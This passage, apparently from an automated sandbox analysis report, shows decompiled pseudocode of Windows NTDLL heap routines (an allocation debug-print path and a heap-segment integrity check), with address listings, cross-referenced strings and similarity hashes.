						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E1E3BEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E1E464496(_t181, 0);
						_t177 = L1E3C4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E1E4649A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E1E45FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E1E3A1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E1E3D16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1E464496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1e496360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1e496364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1e496366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1E44D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E1E3AB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E1E3AB150("Just allocated block at %p for %Ix bytes\n",  *0x1e496360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1e496378 = 1;
									 *0x1e4960c0 = 0;
									asm("int3");
									 *0x1e496378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1e495708; // 0x0
					 *0x1e49b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E1E3FD130(0, _t177, _t181);
				}
			}

0x1e462d82
0x1e462d84
0x1e462d89
0x1e462d8e
0x1e462d90
0x1e462d92
0x1e462d97
0x1e462d9a
0x1e462da4
0x1e462dc0
0x1e462dc3
0x1e462dd1
0x1e462dd6
0x1e462dd8
0x1e4630a7
0x1e4630a7
0x1e4630aa
0x1e4630aa
0x1e4630ad
0x1e4630b4
0x00000000
0x1e4630b9
0x1e462de3
0x1e462de8
0x1e462deb
0x1e462dee
0x1e462df1
0x1e462df3
0x1e462dfb
0x1e462dfb
0x1e462df5
0x1e462df5
0x1e462df5
0x1e462e04
0x1e462e0a
0x1e462e0d
0x1e462e11
0x1e462e11
0x1e462e12
0x1e462e15
0x1e462e18
0x1e462e1a
0x1e463027
0x1e463027
0x1e46302d
0x1e463030
0x1e46304f
0x1e463054
0x1e463032
0x1e463047
0x1e46304c
0x1e46305a
0x1e463063
0x00000000
0x1e462e20
0x1e462e20
0x1e462e23
0x00000000
0x00000000
0x1e462e29
0x1e462e2b
0x1e462e47
0x1e462e2d
0x1e462e33
0x1e462e38
0x1e462e3f
0x1e462e42
0x1e462e42
0x1e462e4e
0x1e462e5d
0x1e462e5f
0x1e462e62
0x1e462e66
0x1e462e6b
0x1e462e6d
0x00000000
0x1e462e73
0x1e462e73
0x1e462e76
0x1e462e7a
0x1e462e83
0x1e462e83
0x1e462e83
0x1e462e85
0x1e462e87
0x1e462e8a
0x1e462e8d
0x1e462e92
0x1e462e9c
0x1e462e9f
0x1e462ea1
0x1e462ea2
0x1e462ea6
0x1e462ea6
0x1e462e9f
0x1e462eab
0x1e462eaf
0x1e462edf
0x1e462ee2
0x1e462ee5
0x1e462eb1
0x1e462eb3
0x1e462eb8
0x1e462ebd
0x1e462ec4
0x1e462ed6
0x1e462ec6
0x1e462ec7
0x1e462ecc
0x1e462ecf
0x1e462ed2
0x1e462ed2
0x1e462ed9
0x1e462ed9
0x1e462ee8
0x1e462eeb
0x1e462eef
0x1e462ef2
0x1e462efe
0x1e462f04
0x1e462f04
0x1e462f04
0x1e462f06
0x1e462f0d
0x1e462f0f
0x1e462f13
0x1e462f13
0x1e462f1b
0x1e462f21
0x1e462f27
0x1e462f95
0x1e462f98
0x1e462f9b
0x1e462fa0
0x00000000
0x00000000
0x1e462fa6
0x1e462fa9
0x1e462fac
0x00000000
0x00000000
0x1e462fb2
0x1e462fb9
0x00000000
0x00000000
0x1e462fc3
0x1e462fca
0x00000000
0x00000000
0x1e462fd0
0x1e462fd6
0x1e462fd9
0x1e462ff8
0x1e462ffd
0x1e462fdb
0x1e462ff0
0x1e462ff5
0x1e46300e
0x1e46300f
0x1e46301a
0x00000000
0x1e462f29
0x1e462f29
0x1e462f2c
0x1e462f4b
0x1e462f50
0x1e462f2e
0x1e462f43
0x1e462f48
0x1e462f56
0x1e462f64
0x1e462f6c
0x1e462f6c
0x1e462f72
0x1e462f76
0x1e462f7c
0x1e462f83
0x1e462f89
0x1e462f8a
0x1e462f8a
0x00000000
0x1e462f76
0x1e462f27
0x1e462e6d
0x1e462da6
0x1e462dab
0x1e462db3
0x1e462db9
0x1e4630bc
0x1e4630c1
0x1e4630c1

APIs

RtlDebugPrintTimes.NTDLL ref: 1E462DB3

Strings

HEAP[%wZ]: , xrefs: 1E462F3E, 1E462FEB, 1E463042
Just allocated block at %p for %Ix bytes, xrefs: 1E462F5F
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1E463015
HEAP: , xrefs: 1E462F4B, 1E462FF8, 1E46304F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E46305E
RtlAllocateHeap, xrefs: 1E462DCA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 56ab5779767ec0a149120f4804234024b4c8be1c52b5c1d85cdfe9eff377c381
Instruction ID: 1d063dee1c5983cc3ab9a99ca2369e4e501475187262cee0b2838a043a702d47
Opcode Fuzzy Hash: 56ab5779767ec0a149120f4804234024b4c8be1c52b5c1d85cdfe9eff377c381
Instruction Fuzzy Hash: 3A91F135910680EFCB15CFA4C450AADBBF2FF8D710F158B5AE446AB351C736A886DB14

Uniqueness

Uniqueness Score: -1.00%

Function 1E464AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E1E464AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E1E3AB150();
						} else {
							E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E1E3AB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E1E45FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E1E3AB150();
						} else {
							E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E1E3AB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E1E3AB150();
									} else {
										E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E1E3AB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E1E45FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E1E3AB150();
										} else {
											E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E1E3FD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E1E46A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E1E3CE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E1E46A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E1E3CE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E1E3CA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E1E3CA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E1E3CBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E1E4523E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E1E3A1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x1e464af7
0x1e464afb
0x1e464afd
0x1e464b01
0x1e464b03
0x1e464b08
0x1e464b0a
0x1e464b0f
0x1e464eb5
0x1e464eb5
0x1e464ebb
0x1e4650d5
0x1e4650d8
0x1e464ff6
0x00000000
0x1e464ff6
0x1e4650de
0x1e4650e4
0x1e4650e8
0x1e465107
0x1e46510c
0x1e4650ea
0x1e4650ff
0x1e465104
0x1e465112
0x1e465115
0x1e465118
0x1e465119
0x1e4650cb
0x1e4650cb
0x1e4650af
0x00000000
0x1e4650af
0x1e464ecb
0x1e4650b6
0x1e4650bb
0x1e464ed1
0x1e464ee6
0x1e464eeb
0x1e4650c1
0x1e4650c2
0x1e4650c5
0x1e4650c6
0x00000000
0x00000000
0x00000000
0x00000000
0x1e464b15
0x1e464b15
0x1e464b1c
0x1e464b1e
0x1e464b23
0x1e464b27
0x1e464b33
0x1e464b38
0x1e464b3a
0x1e464b3c
0x1e464b41
0x1e464b41
0x1e464b3a
0x1e464b52
0x1e465045
0x1e46504b
0x1e46504f
0x1e46506e
0x1e465073
0x1e465051
0x1e465066
0x1e46506b
0x1e465083
0x1e465088
0x1e465088
0x1e46508a
0x1e465091
0x1e465099
0x1e465099
0x1e46509d
0x1e4650a7
0x1e4650ad
0x1e4650ad
0x1e4650ad
0x00000000
0x1e46509d
0x1e464b58
0x1e464b5b
0x1e464b5e
0x1e464b63
0x1e464b66
0x1e464b69
0x1e464b6f
0x1e464be4
0x1e464bf0
0x1e464bf2
0x1e464bf5
0x1e464dc3
0x1e464dc6
0x1e464dc9
0x1e464dce
0x1e464dce
0x1e464dd0
0x1e464dd0
0x1e464dd5
0x1e464def
0x1e464dd7
0x1e464de7
0x1e464de7
0x1e464df3
0x1e465001
0x1e465007
0x1e46500b
0x1e46502a
0x1e46502f
0x1e46500d
0x1e465022
0x1e465027
0x1e465039
0x1e46503a
0x1e46503b
0x00000000
0x1e464df9
0x1e464dfd
0x1e464e90
0x1e464e94
0x1e464e9e
0x1e464ea4
0x1e464ea4
0x1e464ea4
0x1e464ea6
0x1e464ea6
0x00000000
0x1e464ea6
0x1e464e03
0x1e464e08
0x1e464f88
0x1e464f92
0x1e464f99
0x1e464f9c
0x1e464fe0
0x1e464fe4
0x1e464fee
0x1e464ff4
0x1e464ff4
0x1e464ff4
0x00000000
0x1e464fe4
0x1e464f9e
0x1e464fa4
0x1e464fa8
0x1e464fc7
0x1e464fcc
0x1e464faa
0x1e464fbf
0x1e464fc4
0x1e464fd2
0x1e464fd5
0x1e464fd6
0x1e464f34
0x1e464f34
0x00000000
0x1e464f39
0x1e464e0e
0x1e464e14
0x1e464e1b
0x1e464e25
0x1e464e2b
0x1e464e2b
0x1e464e33
0x1e464e38
0x1e464e8a
0x1e464e8a
0x00000000
0x1e464e3a
0x1e464e3e
0x1e464e43
0x1e464e47
0x1e464e53
0x1e464e58
0x1e464e5a
0x1e464e5c
0x1e464e61
0x1e464e61
0x1e464e5a
0x1e464e6e
0x1e464f41
0x1e464f47
0x1e464f4b
0x1e464f6a
0x1e464f6f
0x1e464f4d
0x1e464f62
0x1e464f67
0x1e464f7f
0x1e464f80
0x1e464f81
0x00000000
0x1e464e74
0x1e464e78
0x1e464e82
0x1e464e88
0x1e464e88
0x00000000
0x1e464e78
0x1e464e6e
0x1e464e38
0x1e464df3
0x1e464bfe
0x1e464c01
0x1e464c04
0x1e464c07
0x1e464c09
0x1e464c0c
0x1e464c0e
0x1e464c0e
0x1e464c11
0x1e464c11
0x1e464c0c
0x1e464c14
0x1e464c17
0x1e464dae
0x1e464db2
0x1e464db7
0x1e464dba
0x1e464dbd
0x1e464ef1
0x1e464ef7
0x1e464efb
0x1e464f1a
0x1e464f1f
0x1e464efd
0x1e464f12
0x1e464f17
0x1e464f2b
0x1e464f2b
0x1e464f2d
0x1e464f2e
0x1e464f2f
0x00000000
0x1e464f2f
0x00000000
0x1e464c1d
0x1e464c1d
0x1e464c20
0x1e464c23
0x1e464c26
0x1e464c29
0x1e464c2c
0x1e464c2e
0x1e464d91
0x1e464d91
0x1e464d92
0x1e464d97
0x1e464d9e
0x00000000
0x1e464d9e
0x1e464c34
0x1e464c37
0x1e464c39
0x1e464c3c
0x00000000
0x00000000
0x1e464c45
0x1e464c48
0x1e464c4e
0x1e464c50
0x1e464c78
0x1e464c78
0x1e464c7b
0x1e464c7d
0x1e464c80
0x1e464c84
0x1e464cad
0x1e464cad
0x1e464cb0
0x1e464cb8
0x1e464cbb
0x1e464cbe
0x1e464cc1
0x1e464cc7
0x1e464cdc
0x1e464cc9
0x1e464cd2
0x1e464cd4
0x1e464cd4
0x1e464cde
0x1e464ce0
